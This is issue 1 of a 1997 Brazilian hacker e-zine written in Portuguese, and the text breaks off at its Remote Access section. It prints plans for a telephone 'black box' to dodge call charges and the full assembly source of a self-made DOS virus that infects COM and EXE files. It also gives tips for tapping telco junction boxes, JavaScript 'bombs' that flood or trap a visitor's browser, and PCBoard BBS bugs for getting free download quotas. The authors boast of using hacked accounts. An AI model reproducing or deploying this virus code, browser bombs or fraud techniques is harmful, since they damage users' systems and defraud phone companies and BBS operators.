
   ---------------------------------------------------------------------
    -=[  QUEBRA DE SIGILO -=#=- REVISTA HACKER -=#=- REVISTA MENSAL ]=-
   ---------------------------------------------------------------------

                                        _______
                                       / _____/
                          QUEBRA DE   / /    
                        _____________/ / IGILO
                       /______________/
   
   ---------------------------------------------------------------------
    -=[ Edicao No.01 -=#=- Abril/97 -=#=- By [RiCk> CraZy & Alevirus ]=-
   ---------------------------------------------------------------------
   
 -== = ATENCAO : ESTE ARQUIVO SERA MELHOR VISUALIZADO PELO EDIT DO DOS = == -

           
                        -=[+]=-  INDICE  -=[+]=-
                                ========
                                                   
                 
                 1. Introducao
                 2. AVISO IMPORTANTISSIMO PARA desALEGRIA DA GALERA !!!
                 3. Construa Sua Black Box 
                 4. Autopsia dos Virus - 2
                 5. Um pouquinho sobre Phreaker
                 6. Arme sua Home Page !!!
                 7. HaCkeando PCBoard
                 8. HaCkeando Remote Acces
                 9. Anarchisty 
                10. UNDA UNDA UNDA !!!
                11. Carta dos Leitores
                12. CANJA DA QUEBRA
                                            
 -=[+]================================================================[+]=-


                     -=[#]=-  1. Introducao  -=[#]=-
                             ===============

Sejam bem vindos `a edicao No.01 da nossa Zine !!!
Desculpem a demora pra ficar pronto o zine, mas e' o seguinte :
Agente acessa Internet por assinaturas hackeadas na Mandic, mas deu um
POUCO DE PRIGUISSA e trabalinho pra gente isso ai porque nao tava dando
mais pra fazer assinaturas falsas la, entao tivemos que resolve isso ai,
mas ja estamos de volta depois de recebermos muuuuuuuuitos Mails da galera !
E o melhor... ninguem achou ruim "pelo menos nao nos escreveram reclamando", 
ao contrario, apenas nos elogiaram, e muuuito !!!
Ta certo que tivemos alguns erros de ortografia, como ao inves de escrever
o nome da revista VLAD, escrevemos VALD e etc. Tudo isso devido ao escrita
da mesma ter sido elaborada e escrita em varias madrugadas !!!
Mas no fundo nos divertimos com nossos erros, sendo assim, que nao so agente,
mas voces tb gostaram !!

START !

 -=[+]================================================================[+]=-

     -=[#]=-  2.AVISSO IMPORTANTISSIMO PARA desALEGRIA DA GALERA  -=[#]=- 
             ====================================================

PORRA, QUE BOSTA !!! DEU UMA PUTA DE UMA PREGUISSA DO KCT E AGENTE TAVA AFIM
DE ESCREVE A ZINE ! AI AGENTE RESOLVEU ESCREVER...MAS CADE MATERIA ??????????
FALTO MATERIA, AGENTE NAO SABIA O QUE POR, ENTAO SAIMOS PONDO QUALQUER COISA
QUE ENCONTRAVA !! MAS AGORA ACABO !!! E AGORA ???
AGORA ACHO QUE AGENTE PARA DE VEZ ! NAO SEI QUAL SERA NOSSO PROXIMO PASSO,
NAO SEI SE MONTAREMOS UMA IGREJA OU VAMOS SAIR NA RUA VESTIDOS DE PALHACO !!!
MAS TENHO CERTEZA QUE PARAREMOS DE FAZER O ZINE, ENTAO DIGA ADEUS POIS ESTA
E' A ULTIMA EDICAO POR PREGUISSA E TAMBEM POR FALTA DE MATERIA !
EU "[RICK> CRAZY" E O ALEVIRUS, FAZIAMOS O ZINE TODA MADRUGADA DE QUASE
TODO FIM DE SEMANA ! E TAVA DIFICIL ARRUMAR ASSUNTO ! POIS BEM ! ACABOU !!!
AGORA A UNICA ALTERNATIVA PARA VOCES E' LEREM A AXUR "QUE E' OTIMA" OU A
MERDA DA BARATA COM CHOQUE, OU ENTAO ATE' OUTROS ZINES !!!!!


ATENCIOSAMENTE "[RICK> CRAZY E ALEVIRUS" !!!



 -=[+]================================================================[+]=-

               -=[#]=-  3.Faca Sua Propria Black Box  -=[#]=-
                       ==============================             

Aqui tem um texto que explica como montar sua black box, o texto nao foi
modificado e nenhuma parte dele foi tirada :


Sao Paulo, 1 de Janeiro de 1995.

Um pouco de historia: Eu (Jenkitovski Pharlap), fiz esse texto em 1991, quando
usava o nome de Phreak Ghost. Fiz junto com um amigo meu, na epoca chamado de
PROTOVISION, e atualmente (1994/1995) chamado de DELIRIUM. Esse texto rolou
pelo Brasil inteiro, ate' que uma vez recebi o texto de uma pessoa de Recife.
E' claro que haviam mudado os autores originais. Em baixo segue o texto
original. So' uma pequena atualizacao: Para resistencia, cheguei `a conclusao
de que o melhor e' mesmo um potenciometro de 5K5, pois pode regular bem, ate'
achar o ponto ideal de sua central telefonica. Tambem descobrimos que isso nao
funciona em algumas centrais. Mas e' interessante tentar. Na minha, uso ela
ja' ha' 5 anos (desde 1990, quando me mudei de cidade, e ligava para ca' TODO
DIA, sem pagar um centavo.)

Ai, ai.. Recuerdos, recuerdos...

                                 Sem mais, Jenkitovski Pharlap

***************************************
*      Black Box Plans - ARC 1.1      *
*  Brought to you by the PHREAK GHOST *
*                &                    *
*            PROTOVISION              *
*           United Artists            *
*      Versao brasileira - PKS        *
*                                     *
* Dublado nos Estudios de Walt Disney *
***************************************


Essa e' o inicio de uma serie de arquivos texto cujo intuito e' a mera curiosi-
dade academica. Nao tentem fazer isso em casa, criancas... Pode ser perigoso.

O Autor nao se responsabiliza por eventuais usos indevidos deste arquivo ou de
outros posteriores. Ele, inclusive, desaconselha seu uso.

O intuito desse arquivo e' mostrar como, por hipotese, pode-se fazer com que
uma chamada recebida nao seja tarifada.

Inconvenientes: -A ligacao fica um pouco mais baixa do que o normal
                -A linha costuma cair apos pouco mais de 1 minuto e meio.


Material: -Fio eletrico
--------  -Telefone com tomada padrao Telebras macho (*)
          -Um interruptor com duas posicoes fixas
          -Uma resistencia (**)

(*) Se o seu conector for femea, desconfie....

(** O valor ideal da resistencia e' ignorado ate' o momento, mas parece mudar
     de acordo com cada central telefonica. Mas um numero ideal a todos sera'
     divulgado apos pesquisas tecnicas que estao sendo realizadas.


Instrucoes:
----------
Abra o seu plug padrao Telebras. Esse plug e' aquela coisa quadrada preta e com
quatro pernas chatas que tem no final do fio de seu telefone.
Se voce nao tiver esse plug, compre um, que e' legal.

Obsrve o esquema:

  -----------
  !  A    B !
  ! --    ! !   Plug padrao
  !         !   Telebras
  !       C !
  !  !    ! !
  !         !
  -----!!----
       !!
       !!

Noralmente seu fone usa apenas as chapas A e B. Voce pode observar, ao abrir
o plug do seu fone, que ha' dois conectores juntos no ponto A e um outro no B.
A ordem pode ser diferente, nao importa. Use o que tem apenas um conector, por
ser mais facil de se trabalhar.

Transfira o conector (aquele fiozinho que entra no seu telefone) do ponto B ao
ponto C. Assim o ponto B esta' conectado apenas 'a linha, e o C ao seu fone.

Junte as duas perninhas do resistor entre o ponto B e o C. Nao e' aconselhavel
o uso de solda. Enrole no parafuso da chapa, mesmo.

Se voce usar o seu telefone assim, ele estara' mais baixo. Se a resistencia que
voce escolheu for adequada, voce NAO ouvira' o tom de discar ao tirar o fone
do gancho. Se receber esse sinal, use uma resistencia maior. O problema de uma
resistencia alta e' apenas que o som ficaria baixo.

Agora voce precisa de um controle para o seu telefone poder voltar ao notmal, e
voce poder opera-lo normalmente. Para isso, pegue o interruptor e ligue cada
contato deste com os pontos B e C.Assim, quando voce puser o interruptor na
posicao que fecha o contato, o seu telefone sera' um telefone comum.

Feito isso, feche a caixa com as ligacoes dentro (esmague os componentes se nao
conseguir fechar) e pronto. Seu telefone possui BLACK BOX.



Manual do possuidor:
-------------------
Voce, feliz possuidor de um BLACK BOX, pode oferecer a seus amigos a oportuni-
dade unica de ligarem para sua casa sem pagarem nada. O lance e' que a Telesp
comeca a tarifacao a partir do momento em que a pessoa que recebe a chamada
(voce) tira o fone do gancho. Isso eles interpretam como uma queda na corrente
de sua linha. O que a resistencia faz e' apenas oferecer uma intensidade insu-
ficiente para o inicio da tarifacao, mas suficiente para voce poder escutar bem
o que a outra pessoa fala, e vice-versa.

O pocedimento na hora da ligacao e' simples. Basta, quando receber a chamada,
por o interruptor de modo a ativar a BLACK BOX. Ai' basta pegar o telefone nor-
malmente. Esse procedimento e' bem mais simples do que o descrito em outros
lugares, e funciona realmente, ao menos para os valores de resistencia testados
em nosso Centro de Pesquisas. O outro meio, de se pegar no fone o mais rapido
possivel, apenas para parar de tocar, noa e' necessario e ainda oferece grande
risco de, no caso de nao se ser bem rapido, comecar a contar os impulsos.

Tetes ainda estao sendo feitos quanto 'a resistencia ideal, mas tente algo
como 4K ohms, ou algo assim.

E' recomendavel que, apos a instalacao, seja feito o Teste do Orelhao, que e'
a chamada, em um horario pre-determinado, de alguem em um orelhao para o fone
em que foi instalado o BLACK BOX. Se a pessoa no orelhao conseguir falar sem
fichas com voce, um outro telefone nao paga impulsos.

Lemre-se que voce nao deve fazer esse dispositivo, e esse arquivo e' apenas
uma curiosidade. O Autor nao se responsabiliza por nada e nem quer saber de
nada.

Boa diversao.

 -=[+]================================================================[+]=-

                  -=[#]=-  4.Autopsia dos Virus - 2  -=[#]=-
                          ==========================
Este e' o fonte de um virus feito por mim "Alevirus" ! Se divirtam... !
Ah, fico devendo pra voces os flags do F-Prot, quem quiser passo por mail !
Valeu !
Ah, SE VOCE POSSUI UM GRAU DE CONHECIMENTO EM ASSEMBLER, OU ALGUMA LINGUAGEM
DE BAIXO NIVEL, POR FAVOR ME ESCREVA, POIS PROCURO ALGUEM PARA QUE JUNTO
COMIGO POSSAMOS FAZER UM GERADOR DE VIRUS NACIONAL !
INTERESSADOS ME ESCREVAM :

joker@mandic.com.br


; Autor : Jose Alexandre Rodriguez
; Handle : Alevirus 
; Local de Criacao : Sao Caetano do Sul
; Estilo : Path Loader EXE , COM Infector e COMMAND.COM
; Tecnicas Ant- : TBAV 7.0, F-PROT 225, SCAN?? ISSO E ANT-VIRUS? HAHA! 
; Data de Criacao : Nao Lembro alias meus dois utimos tambem!
; Data de Acao  :  HEHE VE AI MEU!
; Gente fico devendo os flags do F-PROT. Quem quiser passo por Mail!
; Por Favor pelo amor de DEUS nao mude o FONTE!! Acho que voces estao cansados
; de ver isso ne? HAHAHAHAHAHAHAHA se estou publicando e pq pode mudar a 
; vontade!!
; Brasil 1997 t+++++ Gente Abracao!!
; Use o TASM 3.0 para compilar!


;A
VACA            equ     0AFCFh
;e o
FRANGO          equ     056ACh

code            segment
                org     100h
                assume  cs:code,ds:code,es:code

start:
                db      0E9h,3,0         
host:
                db      0CDh,20h,0       
virus_begin:
                call    $ + 3            
                pop     bp
                sub     bp,offset $ - 1
                int     3

                push    ds es

                cli
                mov     ax,VACA          
                push    ax
                pop     ax
                dec     sp
                dec     sp
                pop     bx
                cmp     ax,bx
                je      no_trace
                hlt

no_trace:
                sti
                in      al,21h           
                xor     al,2
                out     21h,al
                xor     al,2
                out     21h,al

                push    cs
                pop     ds
                lea     dx,[bp + offset new_DTA]
                mov     ah,1Ah
                int     21h

                push    [bp + exe_cs]
                push    [bp + exe_ip]
                push    [bp + exe_ss]
                push    [bp + exe_sp]
                call    traverse

                call    activate

                pop     [bp + exe_sp]
                pop     [bp + exe_ss]
                pop     [bp + exe_ip]
                pop     [bp + exe_cs]
                pop     es ds
                mov     dx,80h
                mov     ah,1Ah
                int     21h

                cmp     sp,FRANGO               
                je      exe_exit



com_exit:
                lea     si,[bp + host]          
                mov     di,100h
                push    di
                movsw
                movsb

                call    fix_regs                
                ret                             
exe_exit:
                mov     ax,ds                   
                add     ax,10h
                push    ax
                add     ax,cs:[bp + exe_cs]
                mov     cs:[bp + return_cs],ax

                mov     ax,cs:[bp + exe_ip]
                mov     cs:[bp + return_ip],ax

                pop     ax
                add     ax,cs:[bp + exe_ss]       
                cli
                mov     ss,ax
                mov     sp,cs:[bp + exe_sp]

                call    fix_regs                
                sti

                db      0EAh                    
return_ip       dw      0
return_cs       dw      0

exe_cs          dw      -16                     
exe_ip          dw      103h
exe_sp          dw      -2                      
exe_ss          dw      -16


fix_regs:
                xor     ax,ax
                cwd
                xor     bx,bx
                mov     si,100h
                call     cu

cu:
                xor     di,di
                xor     bp,bp
                ret


traverse:
                sub     sp,64                   
                mov     si,sp
                inc     si
                mov     ah,47h                  
                xor     dl,dl
                push    ds
                push    ss
                pop     ds
                int     21h

                pop     ds
                dec     si
                mov     byte ptr ss:[si],'\' 

next_dir:
                call    infect_dir

                lea     dx,[bp + outer]       
                mov     ah,3Bh
                int     21h
                jnc     next_dir

traverse_done:
                add     sp,64                 
                mov     dx,si
                push    ds
                push    ss
                pop     ds
                mov     ah,3Bh
                int     21h
                pop     ds
                ret

infect_dir:
                mov     ah,4Eh
                inc     byte ptr [bp + offset find_me]
                lea     dx,[bp + find_me]
                int     21h
                dec     byte ptr [bp + offset find_me]
                jc      infect_done

next_file:
                lea     dx,[bp + new_DTA + 1Eh]
                call    file_open
                mov     ah,4Fh
                int     21h
                jnc     next_file

infect_done:
                ret

file_open:
                push    ax cx di es
                call    get_extension
                cmp     [di],'OC'             
                jne     perhaps_exe             
                cmp     byte ptr [di + 2],'M'
                jne     not_prog
                jmp     a_program
perhaps_exe:
                cmp     [di],'XE'               
                jne     not_prog
                cmp     byte ptr [di + 2],'E'
                jne     not_prog
a_program:
                pop     es di cx ax
                jmp     execute                 
not_prog:
                pop     es di cx ax
                ret

execute:
                push    si

                xor     ax,ax                   
                mov     es,ax                   
                lea     ax,[bp + int_24]
                mov     es:[24h * 4],ax
                mov     es:[24h * 4 + 2],cs

                mov     ax,4300h                
                inc     al
                int     21h

                push    cx dx ds
                xor     cx,cx
                call    set_attributes

                mov     ax,3D02h                
                int     21h
                jc      cant_open
                xchg    bx,ax

                mov     ax,5700h                
                inc     al
                int     21h
                push    cx dx
                mov     ah,3Fh
                mov     cx,28
                lea     dx,[bp + read_buffer]
                int     21h

                cmp     byte ptr [bp + read_buffer],'M'
                je      infect_exe              

                mov     al,2                    
                call    move_file_ptr

                sub     dx,VIRUS_SIZE + 3       
                cmp     dx,word ptr [bp + read_buffer + 1]
                je      dont_infect

                add     dx,VIRUS_SIZE + 3
                mov     word ptr [bp + new_jump + 1],dx

                lea     dx,[bp + read_buffer]  
                int     21h
                mov     ah,40h                 
                mov     cx,VIRUS_SIZE
                lea     dx,[bp + virus_begin]
                int     21h

                xor     al,al                  
                call    move_file_ptr

                lea     dx,[bp + new_jump]
                int     21h

fix_date_time:
                pop     dx cx
                mov     ax,5700h               
                inc     al
                int     21h

close:
                pop     ds dx cx               
                call    set_attributes

                mov     ah,3Eh                 
                int     21h

cant_open:
                pop     si
                ret


set_attributes:
                mov     ax,4300h
                inc     al
                int     21h
                ret

dont_infect:
                pop     cx dx                  
                jmp     close



move_file_ptr:
                mov     ah,42h                 
                cwd
                xor     cx,cx
                int     21h

                mov     dx,ax                  
                mov     ah,40h                 
                mov     cx,3
                ret
infect_exe:
                cmp     word ptr [bp + read_buffer + 26],0
                jne     dont_infect            

                cmp     word ptr [bp + read_buffer + 16],FRANGO
                je      dont_infect            

                les    ax,dword ptr [bp + read_buffer + 20]
                mov    [bp + exe_cs],es
                mov    [bp + exe_ip],ax
                les    ax,dword ptr [bp + read_buffer + 14]
                mov    [bp + exe_ss],ax
                mov    [bp + exe_sp],es
                mov    word ptr [bp + read_buffer + 16],FRANGO
                mov     ax,4202h               
                cwd
                xor     cx,cx
                int     21h

                push    ax dx                  

                push    bx
                mov     cl,12                  
                shl     dx,cl                  
                mov     bx,ax
                mov     cl,4
                shr     bx,cl
                add     dx,bx
                and     ax,15
                pop     bx

                sub    dx,word ptr [bp + read_buffer + 8]
                mov    word ptr [bp + read_buffer + 22],dx
                mov    word ptr [bp + read_buffer + 20],ax
                add    dx,100h
                mov    word ptr [bp + read_buffer + 14],dx

                pop     dx ax                  

                add     ax,VIRUS_SIZE + 3
                adc     dx,0
                mov     cx,512                 
                div     cx                     
                inc     ax
                mov     word ptr [bp + read_buffer + 2],dx
                mov     word ptr [bp + read_buffer + 4],ax

                mov     ah,40h
                mov     cx,VIRUS_SIZE + 3
                lea     dx,[bp + virus_begin]
                int     21h


                mov     ax,4200h               
                cwd
                xor     cx,cx
                int     21h

                mov     ah,40h                 
                mov     cx,28
                lea     dx,[bp + read_buffer]
                int     21h
                jmp     fix_date_time          

activate:
                
        mov     ah,2ah
        call    int21
        cmp     cx,1997                        
        jb      dont_activate                  
        cmp     dh,05                            
        jne     dont_activate
        cmp     dl,19                            
        jne     dont_activate
     
        mov     ah,9                             
        lea     dx,[bp+messege]                  
        int     21h
     
        mov     cx,52
        include .\phasor.rtn    ;Voce vai prescisar disso para compilar!

Int21:
        int     21h
        ret
dont_activate:
ret
messege: 
db"         ۲         ߱   ۲  ۲                   ",13,10
db"      ۱          ۰   ۱ ۱   ۲    ۱        ",13,10
db"     ۰             ۱  ۱      ۰      ",13,10
db"               ۰        ۰         ",13,10
db"    ۱ ۱ ۱       ۰ ۲ ۱ ߲  ߱ ",13,10
db"    ۰                             ",13,10
db"                                         ",13,10
db"                                                     ",13,10
db"                                                              ",13,10
db"                ۲                            ",13,10
db"     ۱  ۲   ۲ ۱         ۱ ۱             ",13,10
db"      ۰  ۱     ۱    ۱  ܰܰ            ",13,10
db"      ߱      ۱   ۱   ۲         ",13,10
db"         ۲ ۱ ۰ ۰   ۰ ߱     ۱       ",13,10
db"                               ۰       ",13,10
db"                                                ",13,10
db"                                                                         ",13,10
db"Alevirus 97 !!!!!!!!!!! Call Now ???-???? many files from virii service  ",13,10
db"     Sao Caetano do Sul       CĿOĿRĿIĿNĿGĿAĿBrasil! ",13,10
db"Ligue Para esta Puta: Viviane  2  1  5  1  9  ?  ? Brasil! ",13,10
db" Aberto das 0:00 ate 6:00 A.M BBZBrasil! ",13,10,"$"



get_extension:
                push    ds          
                pop     es
                mov     di,dx
                mov     cx,64
                mov     al,'.'
                repnz   scasb
                ret


find_me         db      ').*',0
outer           db      '..',0

int_24:
                mov     al,3        
                iret
new_jump        db      0E9h,0,0

infections      db      0
virus_end:
VIRUS_SIZE      equ     virus_end - virus_begin
read_buffer     db      28 dup (?)             
new_DTA         db      128 dup(?)

end_heap:

MEM_SIZE        equ     end_heap - start

code            ends
                end     start

 -=[+]================================================================[+]=-


             -=[#]=-  5. Um Pouquinho Sobre Phreaker  -=[#]=-
                     ================================
-.( Materia mandada pelo leitor : Night Wolf ).-

   Phala pessoal !!!! Aki estou eu nesse novo ZINE que promete mexer com a
cabeca da rataiada!!! Espero que vcs estejam gostando do ZINE !! Bom, vamos
phalar um pouco sobre telefonia, telefones publicos e privados, aki tem uma
serie de dicas pra vc sair detonando tudo que eh telefone ;) !!! Algumas
partes sairam de um manual escrito por TOM WAITS (coloquei isso pro kra nao
me encher...;)) 

# --LIGANDO SEM AS TECLAS DO TELEFONE-- #

   Alguns telefones sao protegidos com cadiado nas teclas, ou entao nao
possuem as teclas. Para ligar sem maiores problemas use o sistema de dar 
"tapinhas" naquele local onde vc "pega a linha" aquele local onde o vc poe  
o telefone quando termina a ligacao. Por exemplo, vc quer discar para 1230
vc faz o seguinte:
1-------1 tapinha  (intervalo de uns 2 segundos)
2-------2 tapinhas (intervalo de 2 segundos)
3-------3 "        (idem)
0-------10 tapinhas

   Os "tapinhas" nao podem demorar mais de 0.5 segundos, senao a central
telefonica pensa que vc quer "uma nova linha".

#---Ligacoes Gratis atraves da CAIXA DE VERIFICACAO---#

   Vc ja deve ter visto aquelas caixas cinzas que tem + ou - 1,5 metros 
e tem um codigo preto na parte de cima. Aquelas que os kras da TELEMERDA
usam para verificar se tah tudo ok. Pois eh da pra ligar de lah. Primeiro
de um geito de abrir a caixa (hehehehehehe!) depois pegue um dos varios 
pares de fios que tem lah e ligue no seu telefone portatil ou laptop. 
Pronto!!! Agora vc pode ligar ateh pro inferno de graca ;).

#---Conectando NOTEBOOKS em telefones publicos---#

   O conector do NOTEBOOK eh do tipo JACK, tem 4 fios dentro dele. Arranque
o conector de plastico que tem no final dele, pegue os dois fios centrais
e separe-os dos fios das extremidades. Este 2 fios serao ultilizados para
fazer a ligacao. Eh aconselhavel vc usar um jacare neles, bom te mais!! 
Que??? Vcs querem saber o q eh um jacare??? Ah sim..ja ia me esquecendo...
bom jacare eh um pequeno ganho que vc acha em qualquer loja de material 
eletronico.

   No proximo numero devo escrever algo melhor e mais original ;-)
   Espero que tenham gostado.   
   Vejo vcs no proximo numero !!!!!    


 -=[+]================================================================[+]=-


                  -=[#]=-  6.Arme a sua Home Page  -=[#]=-
                          ========================

Voce deve estar perguntando : "Como assim, armar minha Home Page ?"
E'o seguinte brother... basta colocar algumas bombinhas, que se o panaca do 
lamer clicar no botao especificado como a bomba, acontecera algumas coisas 
desagradaveis a ele !!! =)
Ai vao os Scripts das bombas com as devidas descricoes :


1. [ Essa e' Uma bomba simples que simula um virus. Quando o botao e'acionado 
uma mensagem e' exibida na tela. Esta mensagem da um aviso de que seu 
computador esta com virus. A ultima mensagem avisa que seu navegador foi 
afetado e sera fechado. Depois disso ele e' fechado! 
:-) Somente para Netscape 2.X.]

----------------------------------------------------------------------------

<SCRIPT LANGUAGE="JavaScript">

function ConfirmClose() {
        alert("Error: 107x has ocurred. The Virus: 'Di Vinchi' has been
        detected on Drive C. pleasy erase ALL infected files.")
        if (confirm("Pleasy inform the the hardware vendor of this error."))
                  alert('The virus has been contained, to fully recover the
                  browser will shutdown');
        else

                  alert('The problem has not been fixed, the browser will
                  shut downto prevent further contamination.')
       {
       window.close()
       }
}
</SCRIPT>
----------------------------------------------------------------------------


2.[ Bomba que ao lamer clicar no botao, vai abrir 30 janelas do netscape,
e se ele tentar fechar alguma, vao abrir mais 30... ate que ele reboot o
micro !!! ]
----------------------------------------------------------------------------

<SCRIPT LANGUAGE="JavaScript">

Function WindowBomb()
{
   var iCounter = 0  //  dummy counter

   while (true)
     {
       window.open("http://www.netscape.com","CRASHING" + iCounter, "whidth=1,
       height=1,resizable=no")
       iCounter++
     }
}
</SCRIPT>
----------------------------------------------------------------------------

3.[Exibe uma mensagem de alerta na tela milhares de vezes, se voce clica em
OK, ela aparece de novo.]

<SCRIPT LANGUAGE="JavaScript">

Function AnnoyingButton()
{
   while (true)
      window.alert("Vai a Merda")
}
</SCRIPT>
----------------------------------------------------------------------------

4. [Abre varias vezes a mesma Home Page, nao adiante clicar em stop]

<SCRIPT LANGUAGE="JavaScript">

Function ReloadBomb()
{
 history.go(0)
 window.setTimeout('ReloadBomb()',1)
}
</SCRIPT>

 -=[+]================================================================[+]=-

                  -=[#]=-  7.HaCkeando PCBoard  -=[#]=- 
                          =====================
 
.:( Atencao .: Grande parte deste texto foi estraido de um texto feito por
Andre Saes, e nada foi modifico.):.

1. Introduo

        Antes de iniciar este documento, gostaria de falar um pouco  sobre seu
desenvolvimento bem  como de termos  que sero usados neste texto,  juntamente
com sua explicao, tais como Free Download, Batch, etc ...
 
        A 3 anos atras, comecei a usar o gerenciador de BBS PCBoard, optei por
ele pois ao meu modo de ver  o melhor, o mais seguro e o  mais confi vel.  No
entanto, com o passar do tempo, usando e explorando suas atividades, comecei a
encontrar  alguns  problemas, chamados BUGS, no  seu  mdulo principal.  Desta
forma, passei a consultar  diversas pessoas, dos mais diferentes BBS bem  como
sua area de atuao, e o que encontrei?
 
        A maior parte fantasiava, dizia que o David Terry (programador)  teria
escondido macros (cdigos @) dentro do PCBoard onde voc poderia obter o nvel
de Sysop, outros diziam em fazer backdoors, mais no fundo, nada  lgico.
 
        Com o meu conhecimento de PCBoard, comecei a pesquisar sua  estrutura,
tanto em testes em relao ao meu sistema bem  como em outros sistemas.  Desta
forma  sim, encontrei  defeitos, usando os mesmos, fui  desvendando um  enorme
potncial neste sistema, ou seja, os problemas esto meio que relacionados.
 
        Fiz este texto, pois achei que ja estava  no exato momento dos  Sysops
tomarem este conhecimento, e ao contr rio do que  muitos podem dizer, no  sou
ningum metido a hacker e muito menos procuro  publicidade com isto. De  outro
lado, desejo  que este texto chegue nas mos do programador David Terry,  pois
assim tenho certeza de que, ele far  o possvel para corrigir estes problemas.
 
        Antes que  me esquea, falarei agora um pouco  sobre estes termos  que
sero de extrema necessidade na leitura deste texto, segue abaixo:
 
         Free download: FLAG (marca)  para o arquivo, de tal  forma que  este
          no ser  contado pelo sistema, em relao a bytes e tempo (min.)
 
         Batch: Estrutura de arquivos do PCBoard, a qual armazna a lista  dos
          arquivos que sero retirados posteriormente pelo usu rio,  acessivel
          via comando FLAG, ou algum seguido de D (sufixo para download)
 
        Aps concluida a leitura deste texto, aguardo seu feedback.
        EMAIL: andre@tecepe.com.br  ou  asaes@tecepe.com.br
 
 
2. Relao dos bugs e r pidas explica"es

        Nesta  parte,  pretendo relatar apenas os  bugs e o que  capaz de  se
fazer com os mesmos, segue abaixo:
 
         Bug em arquivos free download
          Com este bug  possvel voc conseguir mais tempo e bytea atravs de
          uma sequncia de repetio/cancelamento da transferncia.
 
         Bug no sistema Batch do PCBoard
          Com  este bug   possvel voc fazer  downloads de quantos  arquivos
          voc desejar, independentemente de tempo e bytes
 
         Bug em linhas de parametros
          Em algumas  linhas, tais como  download ou upload (especificao  de
          arquivos) voc poder  usar macros que somente Sysops teriam acesso.
 
 
3. Bug em arquivos free download

        Para muitos Sysops  interessante deixar alguns arquivos free download
tais como  allfiles, manuais, etc .. S que estes, por sua vez, no pensam  em
que estes simples arquivinhos poderiam contribuir, e muito em relao a  tempo
para o usu rio.
 
        Procedimentos:
 
         Faa o download de algum arquivo que seja free download, tal como  a
lista  de todos arquivos (allfiles), pois este na maioria dos BBS  encontra-se
como free download
 
         Use o  Norton Disk Editor, ou qualquer programa que altere o  numero
de bytes, e retire apenas 10 bytes, por exemplo (um pequeno pedao)
 
         Em  seguida, retorne ao BBS  e marque  novamente  este arquivo  para
download e o faa, com isto, o crash recovery do arquivo ser  ativado, ou seja
a transferncia tomar  o rumo de onde parou.
 
         Aps a transferencia, verifica-se que seu tempo pelo menos ficou 10x
maior, isto explica-se pois o PCBoard no soube  cotar quanto tempo demorou  o
arquivo realmente, e multiplica o tempo do usu rio por um valor negativo. Veja
o exemplo abaixo:
 
       Ŀ
        O usu rio tinha disponvel apenas 30 minutos, aps o crash     
        recovery este tempo foi multiplicado por 0.1, ou seja, o tempo 
        do usu rio ficou em mdia 10x maior.                           
       
 
        Correo (somente para os Sysops)
 
         A princpio, a unica correo  aguardar a soluo vinda da Salt Air
Porm, voc pode criar um PPE substitutivo tanto para a linha de comandos, que
verifica tempo anterior no pode ser  maior que o atual, ou ento na linha  em
que  o  sistema informa o numero de CPS  obtidos, e faz a devida subtrao  do
tempo inicial pelo valor real da transferncia.
 
         Voc pode encontrar os PPEs no meu  BBS, PCI BBS, porm, como o  BUG
no fui eu quem criei, cobrarei por este conjunto de solu"es. Visite-nos para
obter mais informa"es.
 
4. Bug no sistema Batch do PCBoard

        Devido a este assunto ser relativamente extenso farei algumas divis"es
para um melhor compreendimento bem como uma melhor organizao no texto.
 
        1 Parte - Fazendo downloads por outros meios
        
        O comando Download (D) na realidade  faz apenas a leitura do   arquivo
        BATCH  do PCBoard (lista  dos arquivos)  e envia  para voc os mesmos,
        porm esta no  a unica forma.
 
        Por exemplo, o  comando B (Boletins)  permite voc fazer download  dos
        mesmos caso voc intercale comandos, tais como B D #do boletim.
 
        Pense um seguinte, se voc marcar arquivos, porm o sistema no  deixe
        disponvel o comando D, use o comando  B D A para retirar os  arquivos
        marcados (muito util no Mandic BBS, por ex ;)))
 
        Outra forma  voc usar o R L QW, que retirar  um pacote de  mensagens
        com as ultimas, porm, este pacote ser   mais um no batch, ou seja,  o
        PCBoard enviar  todo o batch.
 
        CASOS e CASOS? - Se o sistema estiver setado para no m ximo 1 arquivo
        no batch, no adianta voc querer usar estes comandos, pois o  arquivo
        enviado no sistema R L QW ser  o pacote de mensagens  (1a. prioridade)
        e no caso dos boletins, somente o primeiro arquivo marcado da lista.
 
 
        2 Parte - Fazendo repetio de arquivos
        
        Voc sabe que o PCBoard dispoe de um comando util, D aps o comando  L
        ou aps o comando Z, ou seja, todos os arquivos  listados nesta  seo
        sero   automaticamente marcados e  retirados na prxima partida  para
        download (nem diria comando, pois as formas de download so  diversas,
        como diz o tpico acima)
 
        Este bug  torna-se meio complicado  de se explicar, no  entanto  basta
        saber que, arquivos duplicados em batch   (voc conhece esta mensagem)
        no so contatos quanto a tempo e bytes.
 
        Veja o exemplo abaixo para obter auxlio:
 
            Ŀ
             (30 minutos) Comando? L *.* 4 D NS                      
             (30 minutos) Comando? D                                 
             XYZ arquivos no podem ser marcados por falta de tempo  
             (A)borta, (G)oodbye, (P)rotocolo, etc... (A)            
             (30 minutos) Comando? L *.* 4 D NS                      
             (30 minutos) Comando? D                                 
             XYZ arquivos duplicados, no marcados.                  
            
 
        Na ltima linha observa-se que alguns arquivos foram duplicados, estes
        o PCBoard no contar . Portanto, aqueles XYZ iniciais sero  marcados,
        ou seja, se a  transferncia tivesse no m ximo  30 minutos, esta  ser 
        agora  de 60, se  voc fizer mais   uma vez, no caso da area ter  mais
        de #P arquivos, a transferncia ser  de 120 minutos, e assim vai.
 
        Correo: Esta no pacote fornecido por mim, na minha BBS.
 
 
        3 Parte - Bug nas portas
        
        Voc certamente ja viu a mensagem: Abrindo x porta a lista de arquivos
        ser  apagada, ou arquivos marcados sero perdidos. No  entanto,   esta
        parte vai mais para os usu rios simples.

        No ligue para isso, pois quando voc  retorna o Batch esta l ,   pois
        fisicamente no h  motivos para o PCBoard apagar a lista de arquivos.
 
        Lendo as partes 1 e 2, voc saber   como usar isso para obter   espao
        maior, em relao a bytes e minutos.
 
 
5. Bug em linhas de parametros

        Este BUG no tive muito tempo para analisar, mais assim a princpio as
linhas de parmetros acessveis so: Download e Upload, mas  o por que  destas
linhas estarem relacionadas ao bug?
 
        Esperimente digitar @CLS@, ou entao @BEEP@, voc perceber  que:
 
         As fun"es dos respectivos comandos foram assumidas tais como limpar
          a tela e soar um BEEP sonoro.
 
        Imagina se usar a funo POS e colocar um PPE intercalado no incio da
tela, voc poder  rodar um PPE (espero eu)
 
 
 -=[+]================================================================[+]=-

                -=[#]=-  8.HaCkeando Remote Acces  -=[#]=-
                        ==========================

